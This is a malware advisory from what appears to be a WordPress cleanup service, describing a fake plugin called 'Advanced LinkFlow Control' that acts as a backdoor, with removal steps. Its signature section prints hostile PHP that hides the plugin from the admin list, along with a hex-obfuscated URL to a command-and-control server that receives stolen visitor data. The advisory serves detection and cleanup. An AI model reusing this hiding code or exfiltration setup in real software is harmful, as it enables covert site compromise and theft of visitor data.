Starter Offer: WordPress Malware Cleanup From $89 Claim on WhatsApp →

Malware Advisory High Severity

Advanced LinkFlow Control v1.2.5

/advanced-linkflow-control/

Quick Answer

If you discovered the "Advanced LinkFlow Control" plugin in your WordPress files, your site is infected with a stealth backdoor. This malware hides itself from the admin dashboard, clears cache plugins to persist, and secretly exfiltrates visitor data to a remote server. You must delete the advanced-linkflow-control folder immediately.

Threat Behavior & Purpose

Disguises itself as a utility plugin, hides from the WordPress admin list, and acts as a backdoor to exfiltrate visitor data (IPs, User Agents). It also clears caching plugins to persist injected SEO spam and cloaks content from search engines.

Injects spam Cloaks for search bots
Search Engine Cloaking Targets:
Google Bing Yandex Baidu

Main File

advanced-linkflow-control.php

Fake Author

WpDevNinjas Team

Full Installation Path

wp-content/plugins/advanced-linkflow-control/advanced-linkflow-control.php

Malware Family

SEO Spam

Malicious Code Signature

If you find the following code signature in your files, your site is compromised:


                  
                    add_filter('all_plugins', function ($plugins) {
        if (isset($_GET['sp'])) {
            return $plugins;
        }
        $current = plugin_basename(__FILE__);
        unset($plugins[$current]);
        return $plugins;
    });
    
    // Decoded C2 Server
    private $server_url = "\x68\x74\x74\x70:\x2f/\x77h\x74a\x73f\x64e\x2ei\x63u\x2fg\x65t\x2ep\x68p"; // http://whatsdf.icu/get.php
   
                  
                

Removal Protocol

Difficulty: Easy Recurrence Risk: Low Requires DB Cleanup
  1. Access your server’s file system via FTP or File Manager.
  2.  Navigate to `wp-content/plugins/`.
  3.  Locate and completely delete the `advanced-linkflow-control` folder to eliminate the backdoor.
  4. Verify the removal by ensuring no related active processes remain and checking your `wp-options` for any leftover transients.

Evidence & Screenshots

advanced-linkflow-control_evidence-1